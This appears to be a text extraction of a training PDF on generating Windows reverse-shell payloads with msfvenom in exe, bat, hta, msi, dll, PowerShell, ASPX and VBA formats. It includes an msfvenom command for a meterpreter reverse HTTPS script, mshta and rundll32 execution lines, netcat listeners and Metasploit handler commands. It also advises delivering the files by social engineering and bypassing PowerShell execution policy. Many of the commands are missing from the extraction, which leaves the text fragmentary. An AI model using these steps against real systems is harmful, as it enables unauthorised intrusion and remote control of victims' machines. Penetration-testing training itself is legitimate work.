MSFVENOM
MSFVENOM
Contents
Requirements: ........................................................................................ 3
MsfVenom Syntax .................................................................................. 3
Payload and its types ............................................................................. 3
Executable Payload (exe) ....................................................................... 5
Powershell Batch File ............................................................................. 5
HTML Application Payload (HTA) ........................................................... 6
Microsoft Installer Payload (MSI) .......................................................... 7
Dynamic-link library Payload (DLL) ........................................................ 8
Powershell Payload (psh-cmd) ............................................................... 9
Powershell Payload (ps1) ..................................................................... 10
Web shell Payload (ASPX) .................................................................... 12
Visual Basic Payload (.vba) ................................................................... 13
Page 2 of 16
Requirements:
Kali Linux
Windows Machine
MsfVenom Syntax
MsfVenom is a Metasploit standalone payload generator that is also a replacement for msfpayload and
msfencode.
Page 3 of 16
Page 4 of 16
As we have mentioned above, this post may help you learn all the possible methods to generate various
payload formats for exploiting the Windows Platform.
The entire malicious code will be written inside the shell.exe file and will be executed as an exe program
on the target machine.
Share this file using social engineering tactics and wait for target execution. Meanwhile, launch netcat as
a listener for capturing reverse connections.
nc -lvp 443
The entire malicious code will be written inside the shell.bat file and will be executed as a.bat script on
the target machine.
Page 5 of 16
Share this file using social engineering tactics and wait for target execution. Meanwhile, launch netcat as
the listener for capturing reverse connections.
nc -lvp 443
The entire malicious code will be written inside the shell.hta file and will be executed as a.hta script on
the target machine. Use the Python HTTP Server for file sharing.
Page 6 of 16
mshta http://192.168.1.3/shell.hta
An HTA is executed using the program mshta.exe or by double-clicking on the file.
This will bring reverse connection through the Netcat listener, which was running in the background to
capture reverse connection.
nc -lvp 443
Page 7 of 16
This will bring reverse connection through the Netcat listener, which was running in the background to
capture reverse connection.
nc -lvp 443
rundll32.exe shell.dll,0
This will bring reverse connection through the netcat listener, which was running in the background to
capture reverse connection.
nc -lvp 443
Page 8 of 16
Powershell Payload (psh-cmd)
Payload Type: Stager
Format – psh, psh-net, psh-reflection, or psh-cmd
The generated payload for psh, psh-net, and psh-reflection formats has a .ps1 extension, and the
generated payload for the psh-cmd format has a .cmd extension. Else you can directly execute the raw
code inside the Command Prompt of the target system.
Execute the following command to generate raw code for the malicious PowerShell program.
For execution, copy the generated code and paste it into the Windows command prompt. This will bring
reverse connection through the netcat listener, which was running in the background to capture reverse
connection.
nc -lvp 443
Page 9 of 16
Powershell Payload (ps1)
Payload Type: Stager
A PS1 file is a script, or "cmdlet," used by Windows PowerShell. PS1 files are similar to .BAT and.CMD files,
except that they are executed in Windows PowerShell instead of the Windows Command Prompt. Execute
the following command to create a malicious PS1 script, with the filename extension. PS1 is used in
Windows PowerShell.
msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f
psh > shell.ps1
Since the reverse shell type is meterpreter, we need to launch an exploit/multi/handler inside the
Metasploit framework.
PowerShell’s execution policy is a safety feature that controls the conditions under which PowerShell
loads configuration files and runs scripts. This feature helps prevent the execution of malicious
scripts. It prevents the running of all script files, including formatting and configuration files
(.ps1xml), module script files (.psm1), and PowerShell profiles (.ps1).
More information is available here.
In order to execute the PS1 script, you need to bypass the execution policy by running the following
command in Windows PowerShell and executing the script.
Page 10 of 16
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
exploit
sysinfo
As soon as the target executes the shell.ps1 script, an attacker will get a reverse connection through a
meterpreter session.
Page 11 of 16
Web shell Payload (ASPX)
Payload Type: Stageless
An ASPX file is an Active Server Page Extended file for Microsoft’s ASP.NET platform. When the URL is
viewed, these pages are shown in the user’s web browser. ".NET web forms" is another name for them.
Execute the following command to create a malicious aspx script, with the filename extension of. aspx.
You can inject this payload for exploiting Unrestricted File Upload vulnerability if the target is IIS Web
Server.
Page 12 of 16
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter/reverse_https
exploit
sysinfo
As soon as the attacker executes the malicious script, he will get a reverse connection through the
meterepreter session.
Page 13 of 16
Now we open our workbook that has the malicious macros injected into it.
Page 14 of 16
As soon as the attacker executes the malicious script, he will get a reverse connection through the
meterepreter session.
use exploit/multi/handler
set payload
windows/x64/meterpreter/reverse_https
set lhost 192.168.1.3
set lport 443
exploit
sysinfo
Page 15 of 16
Page 16 of 16
Mastering
Ethical Hacking & Cyber Security
Internship & Placement